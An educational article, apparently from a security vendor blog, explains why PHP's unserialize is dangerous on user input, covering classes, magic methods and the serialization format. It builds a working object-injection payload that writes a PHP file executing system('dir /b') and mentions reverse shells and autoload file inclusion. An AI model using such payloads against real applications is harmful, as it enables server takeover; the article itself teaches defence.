Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code
Unserialize is a PHP function that, while often classified as a security risk, is seldom defined. This article explains the vulnerability and contains a PHP Classes Crash Course that includes properties and ‘magic methods’. It uses examples to illustrate the basic concepts of Deserialization, PHP Object Injection and Class Autoloading in PHP.
Your Information will be kept private.
Your Information will be kept private.
In PHP, as in every other programming language you use for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive user input, or the user-controlled data should be sanitized in order to prevent a malicious user from breaking the intended functionality.
In most scenarios, it’s obvious why a given function argument should not be able to be controlled by the user. Many programming guides will supply a list of relevant functions. This table lists a few examples for PHP (incomplete).
Function | Reasons to be Careful |
system |
These functions allow you to execute system commands. They, therefore, should not accept user-controlled input in arguments. |
include |
Using one of these functions on user-controlled input can lead to local or remote file inclusions. |
unserialize | This function is very often left unexplained! |
Unserialize is a function that is generally used to convert a class into a string that can be stored and used later, so that it can be passed to other functions, or cached in case it’s going to be needed often. Almost every guide on developing secure PHP applications contains the unserialize function, but few explain why you should never use it on user-supplied input.
The reality is that exposing this function can have serious consequences. In fact using user-controlled input in unserialize is so dangerous that even the developers of PHP stopped treating exploitable bugs in the C code that powers unserialize as security vulnerabilities (see Unserialize security policy).
This sounds a little confusing at first, but if you examine the PHP documentation, you will see that it suggests that you never use unserialize on user-supplied input. This is a very clear warning. The PHP language developers assume that you would never expose this function to an attacker. This means that even if someone discovers an exploitable buffer overflow in PHP (that’s caused by unserialize), it will not be considered a security vulnerability by the PHP developers – because unserialize was never designed to be used in this way in the first place!
💡 It’s worth pointing out that some other, popular PHP web applications, Joomla, WordPress and Piwik, have also suffered from PHP object injections.
PHP Classes Crash Course
To understand the problem with unserialize, you first have to have a basic understanding of PHP classes. I created the class below and will explain to you how it works.
- In line 3, I created a name for the class, Logging.
- In lines 5-7 I defined different properties (or variables) for the class. As you can see, I used the public, protected and private keywords. Their purpose is easily explained.
Properties
If I created a subclass from my Logging class, it would inherit all the public and protected properties. This means if I created a subclass named LoggingSubclass, I could access all the protected and public properties, while the private ones would be accessible only by the class that created them.
Even though both the public and protected properties can be inherited, there is a small difference between the two. You can get, and set, a public property as illustrated.
However, a protected property is only meant for internal use within the class and can’t be accessed directly. From my description, you have probably noticed that I didn’t use the keywords correctly in the example above. It would be enough to set them all to protected, as we don’t need to access them. The reason I wanted to include all the keywords will become obvious later when we examine the serialize function.
Magic Methods
You can see that I have defined the __construct method (or function). This is sometimes referred to as a ‘magic method’. Magic methods are named after the specific action that leads to their execution. They’re easily recognized by their two leading underscores.
For example __construct will be called as soon as we create a new instance of the class. This is done using the ‘new’ keyword displayed in the code above. We can pass arguments to the __construct method by writing them in parentheses after the class name: new Test(‘value’). If we create a new instance of a class, all its methods and properties are returned in an object we can easily access.
Later in the code, there is the method createLog, that creates a new log file if it doesn’t yet exist, and then the logAction function writes a new log entry into the file. However, there is one method in the Logging class that we’ve not yet mentioned: __wakeup. You can tell that it’s a magic method like __construct from its initial two underscore characters. However, instead of being called after a new instance of a class is created, __wakeup will be called as soon as a serialized object of the class is deserialized.
What is (De)serialization?
serialize()
Simply put, when you serialize an object, you create a string representation of it. To do this, you use the serialize function as illustrated. Since it may contain null-bytes that are not visible, I used the str_replace function to make them visible.
As you see, we have created a new instance of the Logging class, and chose ‘Alice’ as the username. We also made a test entry that should already be logged. If we look at the code, this should change the log_file property to something like ‘logs/Alice_07-09-17.log’ and the last_log property to ‘making a test entry’.
Let’s take a look at the serialized output:
O:7:"Logging":5:{s:8:"last_log";s:19:"making a test entry";s:9:"last_time";i:1504796057;s:11:"\x00*\x00log_date";s:8:"07-09-17";s:11:"\x00*\x00username";s:5:"Alice";s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";}
This table explains what’s going on in the code.
Code | Action |
O:7:”Logging”:5:{ … } |
This is an object of our Logging class. Objects always begin with an uppercase ‘O’ in serialized strings. After a colon there is the number of characters in the class name, in this case ‘7’. After another colon, there is the actual class name in double quotes, followed by the number of properties (‘5’). The properties are then listed within the curly brackets. |
s:8:”last_log”;s:19:”making a test entry”; |
This is a public property. The property name is a string, indicated by a lowercase ‘s’, followed by the number of characters. In this case it’s ‘8’, because last_log has eight characters. After the semicolon there is the property value with the same syntax. |
s:11:”\x00*\x00log_date”;s:8:”07-09-17″; | This follows the same logic as above, but this time we have a protected property. Serialize indicates that the property is protected by putting ‘\x00*\x00’ in front of the property name. |
s:17:”\x00Logging\x00log_file”;s:23:”logs/Alice_07-09-17.log”; | This is what a private property looks like. Instead of the asterisk character, Serialize puts the filename between the two null-bytes. Keep in mind, that instead of ‘\x00’, serialize uses an actual null-byte. You should remember this when you read the output of Serialize, as they are non-printable characters. |
unserialize()
By using unserialize, we achieve exactly the opposite. Instead of turning an object into a string, we do it the other way around. We pass a string produced by serialize to the unserialize function, and turn it into an object. This will essentially use the object name and search for a corresponding class name. In our case, O:7:Logging:[…] would result in PHP searching for a class with the name ‘Logging’. If it found one, it would then use all the properties from the serialized string and add them to the object.
Once this is done, the object is in the same state as it was before it was serialized. Therefore you can, for example, take the logging class, serialize it, and put the resulting string into a database and then deserialize it again when it’s needed.
Introducing PHP Object Injection
Let’s summarize what we’ve discussed so far:
- When we deserialize a serialized object the __wakeup method is called automatically
- We can control any of the property values
- We can control what class we want to create an object for
- All we need in order to achieve what we want is user-controllable input in unserialize
Now let’s imagine we have the following code:
As you can clearly see, there is an unserialize call that takes user input as its parameter. Let’s assume the file with our Logging class from above is already included. Is there a way we can gain code execution?
First let’s take a look at the magic method again.
There are two properties in there: log_file and last_log. With createLog we can create a file with the path in the log_file property, and with logAction we can write arbitrary data into it. To gain code execution, an attacker’s goal would be to create a file with a .php extension and then write some PHP code into it. That means we need to pass a string to unserialize that contains a path to a file in the web root. From the code, we know that the /log directory should be writeable. So, we need to add malicious PHP code. For a proof of concept we can execute a system command, for example system(‘dir /b’), on a Windows host. This would reveal all the files in the current directory.
Building an Exploit
Let’s start with O:7:”Logging”:2:{}, since we want the logging class.
Then we need to specify a file path. Let’s choose s:17:”\x00Logging\x00log_file”;s:12:”logs/poc.php”;. As you can see, log_file is a private function, which is why we need to add \x00Logging\x00 in front of it.
Now we also need to add the php code that we want to execute. This code must be inside the last_log property. So we need to add s:8:”last_log”;s:26:”<?php system(‘dir /b’); ?>”;.
The finished string we have to pass in the GET variable data is this:
O:7:"Logging":2:{s:17:"%00Logging%00log_file";s:12:"logs/poc.php";s:8:"last_log";s:26:"<?php system('dir /b'); ?>";}
After this, we can look at logs/poc.php to see if our exploit attempt was successful.
As you can see, the poc.php file was created and the PHP was parsed. The dir /b command executed successfully, and you can see that within the logs directory there are entries from ‘Alice’ and ‘user’. Instead of this relatively harmless payload, an attacker could choose one that gives him a reverse shell which would help him to completely take over the server.
💡 Did you know? PHP Object Injection was thought to be harmless due to a lack of useful __wakeup magic methods. However, in 2009, Stefan Esser explained in his talk Shocking News in PHP Exploitation that with PHP5’s __destruct and __autoloading functions, Object Injection had became a dangerous possibility in mainstream applications and frameworks.
Class Autoloading in PHP
We were lucky that the ‘Logging’ class was included in the page. But what happens when the class is in another file that we don’t have access to? If we are lucky, there is an autoloading feature on the page. Whenever a class is called – or an object is deserialized – PHP searches for the class. If it is not found, it will simply throw an error. However, when a function like the following is defined somewhere, PHP will pass the class name to it and then attempt to load the class again. It is only if that attempt also fails that it throws an error.
As you see, this can also lead to an LFI, by deserializing a class name with the name of a PHP file on the server. While this does not seem useful at first, due to the forced .php extension, it can attackers access to functions that are otherwise inaccessible.
Defining Exactly Why the Unserialize Function is Dangerous
The impact of using user-controlled input, together with the unserialize function, strongly depends on the available magic methods and the code inside them. Aside from __wakeup, there are other magic methods that can be abused, for example, __toString. They don’t need to be easily accessible, but could be abused using the autoload functionality and external libraries in your project.
Finally, even if you don’t have any exploitable methods, there can still be exploitable bugs in the underlying C code in PHP, which can be abused using unserialize. But, they are not considered to be security issues and are therefore given a lower priority by the PHP developers.
It is at this point that we can populate our Functions table from above with the appropriate content.
Function | Reasons to be (Super) Careful |
unserialize | This function can be abused by attackers to gain remote code execution, local file inclusion and a wide range of other vulnerabilities, depending on the code within available magic methods. Attackers can abuse this by deserializing their own malicious PHP objects. |
Our conclusion and recommendation is that you should never use unserialize on user input.